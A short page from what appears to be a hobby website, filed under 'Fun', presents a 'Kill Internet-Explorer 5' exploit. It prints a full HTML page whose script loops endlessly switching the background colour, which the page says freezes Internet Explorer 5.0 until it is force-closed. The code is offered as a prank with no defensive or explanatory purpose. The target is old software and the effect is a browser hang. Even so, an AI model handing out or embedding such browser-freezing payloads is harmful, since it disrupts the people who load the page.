|
|
|
|
Fun: Programs: Utilities |
|
|
|
|
|
Startside -> Fun -> Programs -> Utilities -> Kill Internet-Explorer 5 | |
|
|
Utilities: Kill Internet-Explorer 5This is a new exploit which affects Microsoft Internet Explorer 5.0. When you enter the html document below, IE will freeze and you have to close it withctrl + alt + del.
<HTML>
<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
</BODY>
</HTML>
|
|||
| © 1997 - 2012 Dieter Gerth | ||||